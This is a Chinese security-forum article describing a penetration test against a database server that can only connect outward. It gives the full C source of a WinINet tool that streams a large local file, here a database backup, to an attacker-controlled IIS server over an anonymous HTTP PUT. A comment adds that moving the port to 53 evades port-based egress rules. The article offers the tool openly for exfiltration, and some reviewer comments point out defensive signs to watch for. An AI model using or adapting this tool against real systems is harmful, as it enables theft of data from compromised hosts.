文章作者:pt007[at]vip.sina.com
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。
最近做一个渗透,目标机为一台数据库服务器,对外没有开放,只能反连出来,上面有个100多M的数据库备份,用后门下载的时候总是掉线,听mickey说用PUT方式可以上传大文件,于是从网上找了代码,写了个命令行下上传大文件的C程序。
代码:
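#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <wininet.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wininet.lib")

/*
 * Command-line uploader: sends one local file to an HTTP server in a single
 * PUT request, streaming it through WinINet in fixed-size chunks.
 *
 * Security-relevant properties visible in this file:
 *   - The transfer is plain HTTP to INTERNET_DEFAULT_HTTP_PORT with NULL user
 *     name and password, so the file travels unencrypted and unauthenticated.
 *   - It only works against a server that accepts anonymous PUT (the help
 *     text says write permission must be enabled in IIS). A web root that is
 *     anonymously writable is the precondition worth auditing for.
 *   - On the sending side the observable event is an outbound HTTP PUT with a
 *     large body, which is unusual for a host that is not expected to start
 *     HTTP sessions of its own.
 *
 * The code is written for an ANSI (non-UNICODE) build: argv strings are
 * passed straight into TCHAR* parameters and "PUT" is a narrow literal.
 */

/*
 * Bytes read from disk and handed to WinINet per iteration (about 295 KiB).
 * This is a chunk size, not a limit on the file size; the original comment
 * calling it "300M" was wrong.
 */
enum { UPLOAD_CHUNK_BYTES = 302480 };

void Usage(char *name); /* prints the help text */

/*
 * Upload one file over an already opened WinINet connection using PUT.
 *
 * hConnect   handle returned by InternetConnect.
 * upFile     path of the LOCAL file to read (despite the name).
 * localFile  object name on the SERVER that the PUT request targets
 *            (despite the name), e.g. "/1.db".
 *
 * Returns TRUE when every byte was written and HttpEndRequest succeeded,
 * FALSE otherwise. The request handle and the file handle are released on
 * every path; hConnect stays owned by the caller.
 *
 * NOTE(review): success here means the request completed at the WinINet
 * level. The HTTP status code of the response is not inspected, so a 4xx/5xx
 * answer from the server is still reported as success.
 */
BOOL UseHttpSendReqEx(HINTERNET hConnect, TCHAR *upFile, TCHAR *localFile)
{
    INTERNET_BUFFERS BufferIn = {0};
    BYTE pBuffer[UPLOAD_CHUNK_BYTES];
    HINTERNET hRequest = NULL;
    HANDLE hFile = INVALID_HANDLE_VALUE;
    DWORD dwBytesRead = 0;
    DWORD dwBytesWritten = 0;
    DWORD dwSizeLow = 0;
    DWORD dwSizeHigh = 0;
    DWORD dwErr = 0;
    DWORD sum = 0;
    BOOL bOk = FALSE;

    BufferIn.dwStructSize = sizeof(INTERNET_BUFFERS);

    /* Open a PUT request for the remote object name. */
    hRequest = HttpOpenRequest(hConnect, "PUT", localFile, NULL, NULL, NULL,
                               INTERNET_FLAG_NO_CACHE_WRITE, 0);
    if (!hRequest) {
        printf("Failed to open request handle: %lu\n", GetLastError());
        goto cleanup;
    }

    /* Open the local file that will be sent. */
    hFile = CreateFile(upFile, GENERIC_READ, FILE_SHARE_READ, NULL,
                       OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        printf("\nFailed to open local file %s.", upFile);
        goto cleanup;
    }

    /*
     * dwBufferTotal is a DWORD, so the announced body length cannot describe
     * a file of 4 GiB or more. Ask for the high half of the size as well and
     * refuse such files instead of announcing a truncated length.
     */
    dwSizeLow = GetFileSize(hFile, &dwSizeHigh);
    if (dwSizeLow == 0xFFFFFFFF) { /* INVALID_FILE_SIZE: error or a real size */
        dwErr = GetLastError();
        if (dwErr != NO_ERROR) {
            printf("GetFileSize failed %lu\n", dwErr);
            goto cleanup;
        }
    }
    if (dwSizeHigh != 0) {
        printf("File is too large to announce in dwBufferTotal\n");
        goto cleanup;
    }
    BufferIn.dwBufferTotal = dwSizeLow;
    printf("File size is %lu\n", BufferIn.dwBufferTotal);

    if (!HttpSendRequestEx(hRequest, &BufferIn, NULL, HSR_INITIATE, 0)) {
        printf("Error on HttpSendRequestEx %lu\n", GetLastError());
        goto cleanup;
    }

    /* Stream the file; a zero-byte read marks end of file. */
    for (;;) {
        if (!ReadFile(hFile, pBuffer, sizeof(pBuffer), &dwBytesRead, NULL)) {
            printf("\nReadFile failed on buffer %lu.", GetLastError());
            goto cleanup;
        }
        if (dwBytesRead == 0) {
            break;
        }
        if (!InternetWriteFile(hRequest, pBuffer, dwBytesRead, &dwBytesWritten)) {
            printf("\nInternetWriteFile failed %lu", GetLastError());
            goto cleanup;
        }
        sum += dwBytesWritten;
    }

    /* The body must match the length announced in dwBufferTotal. */
    if (sum != BufferIn.dwBufferTotal) {
        printf("Wrote %lu of %lu bytes\n", sum, BufferIn.dwBufferTotal);
        goto cleanup;
    }

    /* Finish the HTTP request before claiming success. */
    if (!HttpEndRequest(hRequest, NULL, 0, 0)) {
        printf("Error on HttpEndRequest %lu \n", GetLastError());
        goto cleanup;
    }

    printf("Actual written bytes: %lu\nupload %s successed!\n", sum, localFile);
    bOk = TRUE;

cleanup:
    if (hFile != INVALID_HANDLE_VALUE) {
        CloseHandle(hFile);
    }
    if (hRequest) {
        InternetCloseHandle(hRequest);
    }
    return bOk;
}

/*
 * Entry point. Arguments: <server> <remote object name> <local file path>
 * Example: put 127.0.0.1 /1.db c:\wmpub\1.exe
 *
 * Returns 0 on a completed upload and 1 on a usage error or any failure.
 */
int main(int argc, char **argv)
{
    char *ServerName = NULL;
    TCHAR *putfile = NULL;      /* local file to send (argv[3]) */
    TCHAR *putlocalfile = NULL; /* object name on the server (argv[2]) */
    HINTERNET hSession = NULL;
    HINTERNET hConnect = NULL;
    int rc = 1;

    if (argc != 4) {
        Usage(argv[0]);
        return 1;
    }

    ServerName = argv[1];
    putlocalfile = argv[2];
    putfile = argv[3];

    /* Synchronous session (no async flag) using the preconfigured proxy. */
    hSession = InternetOpen("HttpSendRequest", INTERNET_OPEN_TYPE_PRECONFIG,
                            NULL, NULL, 0);
    if (!hSession) {
        printf("Failed to open InternetOpen\n");
        goto cleanup;
    }

    /*
     * Connect to the HTTP service on port 80. The original author notes the
     * port can be changed to any value, e.g. 53; a port-based egress allow
     * list does not tell HTTP on such a port apart from the expected protocol.
     * User name and password are NULL: the request carries no credentials.
     */
    hConnect = InternetConnect(hSession, ServerName, INTERNET_DEFAULT_HTTP_PORT,
                               NULL, NULL,
                               INTERNET_SERVICE_HTTP, /* HTTP, FTP or Gopher */
                               0, 1);
    if (!hConnect) {
        printf("error InternetConnect\n");
        goto cleanup;
    }

    if (!UseHttpSendReqEx(hConnect, putfile, putlocalfile)) {
        printf("error UseHttpSendReqEx\n");
        goto cleanup;
    }
    rc = 0;

cleanup:
    /* Release WinINet handles in reverse order of creation. */
    if (hConnect) {
        InternetCloseHandle(hConnect);
    }
    if (hSession) {
        InternetCloseHandle(hSession);
    }
    return rc;
}

/*
 * Print the help text to stderr. name is the program name shown in the
 * example line. The escapes are restored to \n, \t and \\ (the listing had
 * them flattened to forward slashes, which printed literally).
 */
void Usage(char *name)
{
    fprintf(stderr,
            "===============================================================================\n"
            "\t名称:利用PUT上传300M的大文件\n"
            "\t环境:Win2003+Visual C++ 6.0\n"
            "\t作者:[email protected]\n"
            "\tQQ: 7491805\n"
            "\t声明:本软件由pt007原创,转载请注明出处,谢谢!\n"
            "\t使用说明:1.db为上传后保存后的文件,c:\\wmpub\\1.exe为本地要上传的大文件,\n\t需要IIS里面设置允许写入!\n"
            "\t例子:%s 192.168.1.101 /1.db c:\\wmpub\\1.exe\n"
            "===============================================================================\n",
            name);
}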
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。